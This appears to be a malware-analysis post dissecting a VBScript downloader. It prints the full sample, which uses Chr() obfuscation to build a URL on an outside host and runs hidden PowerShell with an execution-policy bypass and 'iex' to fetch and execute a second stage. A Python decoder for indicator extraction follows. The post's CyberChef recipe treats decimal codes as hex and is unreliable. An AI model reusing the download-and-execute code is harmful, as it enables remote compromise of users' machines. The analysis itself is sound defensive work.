Analysis of a Malicious VBS Script

Like PowerShell, VBA Script is a scripting language that attackers sometimes use to download the second or final stage of their malware, because VBA scripts can interact with the system and the shell. Malware analysts know that VBA scripts are mostly found in Office documents and malicious macros. In this post we analyze a VBA script by walking through its code and decoding the strings that the malware developers encoded or encrypted in order to bypass the programs used to scan devices for malware.

SHA256: 20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147
Sample: https://bazaar.abuse.ch/sample/20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147

Malicious VBA Script Code:
Dim wsh, http, url, method, async
url = Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)
Set wsh = CreateObject("WScript.Shell")
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
method = "GET"
async = False
http.Open method, url, async
http.Send
wsh.Run "powershell -nop -exec bypass -c """"$url='" & url & "';$req=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$req.Open('GET',$url,$false);$req.Send();iex $req.ResponseText""""", 0, async
' Cleanup
Set wsh = Nothing
Set http = Nothing


Code Screenshot:

Code Explanation:

  1. The malware developer declares some variables: wsh, http, url, method, async.
  2. The malware developer uses Chr() character codes to encode and obfuscate the URL that is responsible for downloading the second stage of the malicious file.
  3. The malware developer creates an object to interact with the shell: Set wsh = CreateObject("WScript.Shell")
  4. The malware developer creates an object to issue the Windows HTTP request: Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
  5. The malware developer uses the GET method to download and retrieve the file from the host on which the second stage is hosted.
  6. The malware developer uses PowerShell (-nop -exec bypass) to bypass the execution policy and then executes the downloaded script in memory with iex, in a hidden window (window style 0).

Decoding the Encoded Characters:

  1. Character code: Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)
  2. Open CyberChef.org.
  3. Paste the expression into the Input pane on the right.
  4. In the Operations pane on the left, search for Find / Replace.
  5. Find: Chr\((\d+)\)
  6. Replace: \x$1
  7. Add the From Hex operation (Operations pane).


Result: https[://]yettigretrading[.]com/[.vbs]/1759/1759[.ps1]
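The same decoding done offline, as an added example that is not part of the original post: a small Python tokenizer resolves each Chr() call in the VBS concatenation expression copied from the script above (decimal and &H hex forms, plus "" quote escapes in literals), checks that operands and & alternate so a copy/paste slip is reported rather than silently producing a wrong indicator, and defangs the result for a report. The function names and the standard [.] defanging style are my own.

```python
import re

# Constructed input: the obfuscated right-hand side of `url = ...` from the analysed script.
VBS_URL_EXPR = (
    'Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & '
    'Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & '
    'Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & '
    '"m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & '
    'Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49)'
)
# One token of a VBS string expression: Chr(decimal), Chr(&Hhex), "literal", or &.
TOKEN_RE = re.compile(r'''\s*(?:
      Chr\(\s*(?P<dec>\d+)\s*\)              # Chr(104)   decimal code point
    | Chr\(\s*&H(?P<hex>[0-9A-Fa-f]+)\s*\)   # Chr(&H68)  hex code point
    | "(?P<lit>(?:[^"]|"")*)"                # "literal"  ("" escapes a quote)
    | (?P<amp>&)                             # concatenation operator
    )\s*''', re.VERBOSE | re.IGNORECASE)


def decode_vbs_concat(expr: str) -> str:
    """Evaluate a VBS concatenation of Chr() calls and "literals" (the CyberChef recipe, offline)."""
    out, pos, expect_operand = [], 0, True  # operands and '&' must alternate
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"unexpected token at offset {pos}: {expr[pos:pos + 20]!r}")
        pos = m.end()
        if m.group("amp") is not None:
            if expect_operand:
                raise ValueError("dangling '&' in expression")
            expect_operand = True
            continue
        if not expect_operand:
            raise ValueError("two operands without '&' between them")
        if m.group("dec") is not None:
            out.append(chr(int(m.group("dec"))))  # codes 0-127 are code-page independent
        elif m.group("hex") is not None:
            out.append(chr(int(m.group("hex"), 16)))
        else:
            out.append(m.group("lit").replace('""', '"'))
        expect_operand = False
    if expect_operand and out:
        raise ValueError("expression ends with '&'")
    return "".join(out)


def defang(url: str) -> str:
    """Neutralise a decoded URL so it cannot be clicked when pasted into a report."""
    return url.replace("://", "[://]").replace(".", "[.]")


if __name__ == "__main__":
    print(defang(decode_vbs_concat(VBS_URL_EXPR)))  # https[://]yettigretrading[.]com/[.]vbs/1759/1759[.]ps1
```

Chr() codes above 127 depend on the victim's ANSI code page in VBScript, so for non-ASCII samples compare the decoded bytes against the relevant code page rather than trusting chr() blindly.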
